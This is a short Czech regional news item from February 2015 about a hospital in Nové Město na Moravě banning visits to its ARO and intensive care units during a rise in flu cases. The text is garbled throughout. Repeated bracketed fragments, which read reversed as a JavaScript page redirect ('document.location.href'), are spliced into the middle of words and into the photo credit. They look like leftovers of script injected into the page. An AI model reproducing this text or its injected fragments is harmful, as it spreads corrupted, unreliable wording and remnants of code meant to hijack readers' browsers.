Rainbow page separator

V nemocnici zakázali návštěvy na oddělení ARO a JIP

Neděle, 1. února 2015

Nemocnice Nové Město na Moravě

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / Od soboty 31. ledna až do odvolání platí zákaz návštěv v některých lůžkových odděleních novoměstské nemocnice. Dohodlo se na [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tom vedení zdravotnického zařízení s epidemiology, pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tože v okrese přibylo případů akutních respiračních onemocnění a chřipky.
„Zákaz návštěv na jednotkách intenzivní péče chirurgického a interního oddělení a také na ARO novoměstské nemocnice platí od soboty 31. ledna až do odvolání,“ informoval mluvčí Nemocnice v Novém Městě na Moravě Roman Kra[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tochvíl.
Za uplynulý týden epidemiologové na základě hlášení praktických lékařů z celého okresu evidovali 1729 nemocných v přepočtu na s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to tisíc obyvatel, což je stav blížící se chřipkové epidemii. Nejvíce lidí onemocnělo na Žďársku a na Novoměstsku.
Podle vývoje nemocnosti v nadcházejícím týdnu epidemiologové zváží další kroky. Stávající situaci v okrese s největší pravděpodobností ovlivní začínající jarní prázdniny, pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tože chřipkové viry se nebudou moci šířit ve školních kolektivech.

Fo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to: [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to.com/“ target=“_blank“>www.dajc-naturepho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to.com